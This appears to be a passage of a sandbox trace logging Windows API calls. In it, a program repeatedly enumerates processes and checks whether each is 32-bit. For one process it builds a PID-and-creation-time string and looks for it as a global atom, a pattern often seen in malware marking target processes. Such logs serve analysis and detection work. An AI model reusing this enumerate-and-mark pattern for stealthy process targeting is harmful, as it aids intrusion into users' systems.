	[0081.671] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.671] CloseHandle (hObject=0x39c) returned 1
	[0081.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x39c
	[0081.671] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.671] CloseHandle (hObject=0x39c) returned 1
	[0081.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x39c
	[0081.671] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.671] CloseHandle (hObject=0x39c) returned 1
	[0081.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x39c
	[0081.671] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.672] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.672] GetProcessTimes (in: hProcess=0x39c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.672] wsprintfA (in: param_1=0x74dbe8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.672] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.672] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.672] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.673] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.673] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.673] CloseHandle (hObject=0x39c) returned 1
	[0081.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x39c
	[0081.673] IsWow64Process (in: hProcess=0x39c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.673] CloseHandle (hObject=0x39c) returned 1
	[0081.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2c0
	[0081.725] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.725] CloseHandle (hObject=0x2c0) returned 1
	[0081.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2c0
	[0081.726] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.726] CloseHandle (hObject=0x2c0) returned 1
	[0081.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2c0
	[0081.726] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.726] CloseHandle (hObject=0x2c0) returned 1
	[0081.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2c0
	[0081.726] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.726] CloseHandle (hObject=0x2c0) returned 1
	[0081.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2c0
	[0081.726] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.726] CloseHandle (hObject=0x2c0) returned 1
	[0081.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2c0
	[0081.726] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.726] CloseHandle (hObject=0x2c0) returned 1
	[0081.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2c0
	[0081.726] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.727] CloseHandle (hObject=0x2c0) returned 1
	[0081.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2c0
	[0081.727] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.727] CloseHandle (hObject=0x2c0) returned 1
	[0081.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2c0
	[0081.727] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.727] CloseHandle (hObject=0x2c0) returned 1
	[0081.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2c0
	[0081.727] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.727] CloseHandle (hObject=0x2c0) returned 1
	[0081.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x2c0
	[0081.727] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.727] CloseHandle (hObject=0x2c0) returned 1
	[0081.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2c0
	[0081.728] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.728] CloseHandle (hObject=0x2c0) returned 1
	[0081.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2c0
	[0081.728] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.728] CloseHandle (hObject=0x2c0) returned 1
	[0081.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2c0
	[0081.728] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.728] CloseHandle (hObject=0x2c0) returned 1
	[0081.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2c0
	[0081.728] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.728] CloseHandle (hObject=0x2c0) returned 1
	[0081.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2c0
	[0081.728] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.728] CloseHandle (hObject=0x2c0) returned 1
	[0081.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2c0
	[0081.728] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.728] CloseHandle (hObject=0x2c0) returned 1
	[0081.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2c0
	[0081.728] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.729] CloseHandle (hObject=0x2c0) returned 1
	[0081.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2c0
	[0081.729] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.729] CloseHandle (hObject=0x2c0) returned 1
	[0081.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2c0
	[0081.729] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.729] CloseHandle (hObject=0x2c0) returned 1
	[0081.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2c0
	[0081.729] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.729] CloseHandle (hObject=0x2c0) returned 1
	[0081.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2c0
	[0081.729] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.729] CloseHandle (hObject=0x2c0) returned 1
	[0081.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2c0
	[0081.729] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.729] CloseHandle (hObject=0x2c0) returned 1
	[0081.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2c0
	[0081.729] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.729] CloseHandle (hObject=0x2c0) returned 1
	[0081.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2c0
	[0081.730] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.730] CloseHandle (hObject=0x2c0) returned 1
	[0081.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2c0
	[0081.730] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.730] CloseHandle (hObject=0x2c0) returned 1
	[0081.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2c0
	[0081.730] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.730] CloseHandle (hObject=0x2c0) returned 1
	[0081.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2c0
	[0081.730] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.730] CloseHandle (hObject=0x2c0) returned 1
	[0081.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2c0
	[0081.730] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.730] CloseHandle (hObject=0x2c0) returned 1
	[0081.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2c0
	[0081.730] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.730] CloseHandle (hObject=0x2c0) returned 1
	[0081.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2c0
	[0081.731] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.731] CloseHandle (hObject=0x2c0) returned 1
	[0081.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2c0
	[0081.731] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.731] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.731] GetProcessTimes (in: hProcess=0x2c0, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.731] wsprintfA (in: param_1=0x74e098, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.731] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.732] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.732] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.732] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.732] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.732] CloseHandle (hObject=0x2c0) returned 1
	[0081.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x2c0
	[0081.732] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.732] CloseHandle (hObject=0x2c0) returned 1
	[0081.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3b0
	[0081.771] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.771] CloseHandle (hObject=0x3b0) returned 1
	[0081.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3b0
	[0081.772] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.772] CloseHandle (hObject=0x3b0) returned 1
	[0081.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3b0
	[0081.772] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.772] CloseHandle (hObject=0x3b0) returned 1
	[0081.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3b0
	[0081.772] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.772] CloseHandle (hObject=0x3b0) returned 1
	[0081.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3b0
	[0081.772] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.772] CloseHandle (hObject=0x3b0) returned 1
	[0081.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3b0
	[0081.772] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.772] CloseHandle (hObject=0x3b0) returned 1
	[0081.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3b0
	[0081.773] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.773] CloseHandle (hObject=0x3b0) returned 1
	[0081.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3b0
	[0081.773] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.773] CloseHandle (hObject=0x3b0) returned 1
	[0081.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3b0
	[0081.773] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.773] CloseHandle (hObject=0x3b0) returned 1
	[0081.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3b0
	[0081.773] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.773] CloseHandle (hObject=0x3b0) returned 1
	[0081.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3b0
	[0081.773] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.773] CloseHandle (hObject=0x3b0) returned 1
	[0081.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3b0
	[0081.773] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.774] CloseHandle (hObject=0x3b0) returned 1
	[0081.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3b0
	[0081.774] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.774] CloseHandle (hObject=0x3b0) returned 1
	[0081.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3b0
	[0081.774] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.774] CloseHandle (hObject=0x3b0) returned 1
	[0081.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3b0
	[0081.774] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.774] CloseHandle (hObject=0x3b0) returned 1
	[0081.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3b0
	[0081.774] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.774] CloseHandle (hObject=0x3b0) returned 1
	[0081.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3b0
	[0081.774] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.774] CloseHandle (hObject=0x3b0) returned 1
	[0081.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3b0
	[0081.775] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.775] CloseHandle (hObject=0x3b0) returned 1
	[0081.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3b0
	[0081.775] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.775] CloseHandle (hObject=0x3b0) returned 1
	[0081.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3b0
	[0081.775] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.775] CloseHandle (hObject=0x3b0) returned 1
	[0081.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3b0
	[0081.775] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.775] CloseHandle (hObject=0x3b0) returned 1
	[0081.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3b0
	[0081.775] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.775] CloseHandle (hObject=0x3b0) returned 1
	[0081.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3b0
	[0081.775] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.775] CloseHandle (hObject=0x3b0) returned 1
	[0081.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3b0
	[0081.775] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.776] CloseHandle (hObject=0x3b0) returned 1
	[0081.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3b0
	[0081.776] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.776] CloseHandle (hObject=0x3b0) returned 1
	[0081.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3b0
	[0081.776] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.776] CloseHandle (hObject=0x3b0) returned 1
	[0081.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3b0
	[0081.776] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.776] CloseHandle (hObject=0x3b0) returned 1
	[0081.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3b0
	[0081.776] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.776] CloseHandle (hObject=0x3b0) returned 1
	[0081.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3b0
	[0081.776] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.776] CloseHandle (hObject=0x3b0) returned 1
	[0081.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3b0
	[0081.776] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.776] CloseHandle (hObject=0x3b0) returned 1
	[0081.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3b0
	[0081.777] IsWow64Process (in: hProcess=0x3b0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.777] CloseHandle (hObject=0x3b0) returned 1
	[0081.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3b0
	[0081.777] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.777] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.777] GetProcessTimes (in: hProcess=0x3b0, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.777] wsprintfA (in: param_1=0x74e098, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.778] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.778] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.778] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.778] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.778] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.778] CloseHandle (hObject=0x3b0) returned 1
	[0081.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
